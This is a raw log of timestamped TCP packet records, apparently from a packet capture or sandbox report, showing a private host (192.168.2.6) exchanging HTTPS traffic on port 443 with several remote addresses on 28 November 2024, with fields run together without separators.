                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.893212080 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.893673897 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.893687963 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.894032955 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.894047976 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.914681911 CET4434973413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.914742947 CET4434973413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.914969921 CET49734443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.914969921 CET49734443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.916090965 CET49734443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.916100025 CET4434973413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.917341948 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.917388916 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.917490005 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.918087959 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.918103933 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.414334059 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.414494991 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.416415930 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.416424036 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.416731119 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.480846882 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.484266996 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.531321049 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.879467010 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.879554987 CET49703443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.879933119 CET49747443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.879967928 CET44349747173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.880880117 CET49747443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.881232977 CET49747443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:20.881247997 CET44349747173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.000513077 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.000521898 CET44349703173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.060858965 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061105013 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061126947 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061575890 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061593056 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061646938 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061654091 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061690092 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.061728001 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.062349081 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093449116 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093482971 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093491077 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093524933 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093539000 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093543053 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093584061 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093595982 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093631029 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.093631029 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114510059 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114586115 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114593983 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114707947 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114767075 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114780903 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114790916 CET49739443192.168.2.620.109.210.53
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.114797115 CET4434973920.109.210.53192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.183978081 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.367161989 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.367914915 CET49733443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.367939949 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.368716955 CET49733443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.368721962 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.673722982 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.674467087 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.674479961 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.674972057 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.674978018 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.699408054 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.699986935 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.700011969 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.700531006 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.700537920 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.738085032 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.738658905 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.738681078 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.739187956 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.739192963 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804424047 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804471970 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804542065 CET49733443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804748058 CET49733443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804759979 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804769993 CET49733443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.804775000 CET4434973313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.809391975 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.809443951 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.809549093 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.809745073 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:21.809760094 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.119225979 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.119292021 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.119565010 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.119565010 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.119565010 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.122992992 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.123008013 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.123456955 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.123542070 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.123548985 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144088984 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144141912 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144454956 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144489050 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144489050 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144507885 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.144516945 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.147347927 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.147403955 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.147492886 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.147749901 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.147774935 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.191292048 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.191360950 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.191567898 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.191567898 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.192594051 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.192620993 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.194194078 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.194221020 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.194530010 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.194608927 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.194617987 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.246090889 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.246090889 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.246121883 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.246275902 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.300463915 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.300476074 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.314774990 CET44349747173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.316102028 CET49747443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.342639923 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.403620005 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.403759003 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.403944969 CET44349740172.217.19.225192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.404151917 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.404151917 CET49740443192.168.2.6172.217.19.225
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.407737970 CET49742443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:22.407764912 CET4434974213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.589185953 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.593744040 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.593765020 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.594048023 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.594053030 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.864377975 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.913459063 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.915590048 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.915612936 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.916232109 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.916239023 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.949740887 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.949755907 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.950242043 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.950247049 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:23.991512060 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.002763033 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.002783060 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.003496885 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.003503084 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.040306091 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.040379047 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.040491104 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.068574905 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.068597078 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.068623066 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.068630934 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.079340935 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.079355001 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.079416037 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.099612951 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.099626064 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.301722050 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.301788092 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.301847935 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.348206997 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.348244905 CET49749443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.348258972 CET4434974913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.348273039 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.348335981 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.366329908 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.366343021 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.366374969 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.366380930 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.437963009 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.437998056 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.438117027 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.444673061 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.444731951 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.444936991 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.510449886 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.510467052 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.514705896 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.514730930 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.518471003 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.518491983 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.518575907 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.518731117 CET49755443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.518743038 CET4434975513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.536031008 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.536068916 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.536227942 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.537460089 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:24.537473917 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:25.879117012 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:25.903517008 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:25.903527975 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:25.909306049 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:25.909312963 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.290075064 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.318448067 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.323060036 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.323127031 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.323174953 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.333164930 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.333180904 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.333627939 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.333642960 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.360651016 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.360670090 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.361248016 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.361253977 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.387847900 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.387854099 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.683103085 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.683126926 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.683188915 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.734178066 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.734241009 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.734285116 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.747292042 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.747311115 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.751785040 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.751808882 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.751822948 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.751830101 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.764089108 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.764158010 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.764216900 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.774884939 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.774904013 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.774914980 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.774920940 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.889918089 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.889956951 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.890114069 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.897690058 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.897716999 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.897933006 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.940007925 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.940026045 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.960846901 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.960858107 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.253243923 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.253284931 CET4434976894.245.104.56192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.253355980 CET49768443192.168.2.694.245.104.56
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.296685934 CET49768443192.168.2.694.245.104.56
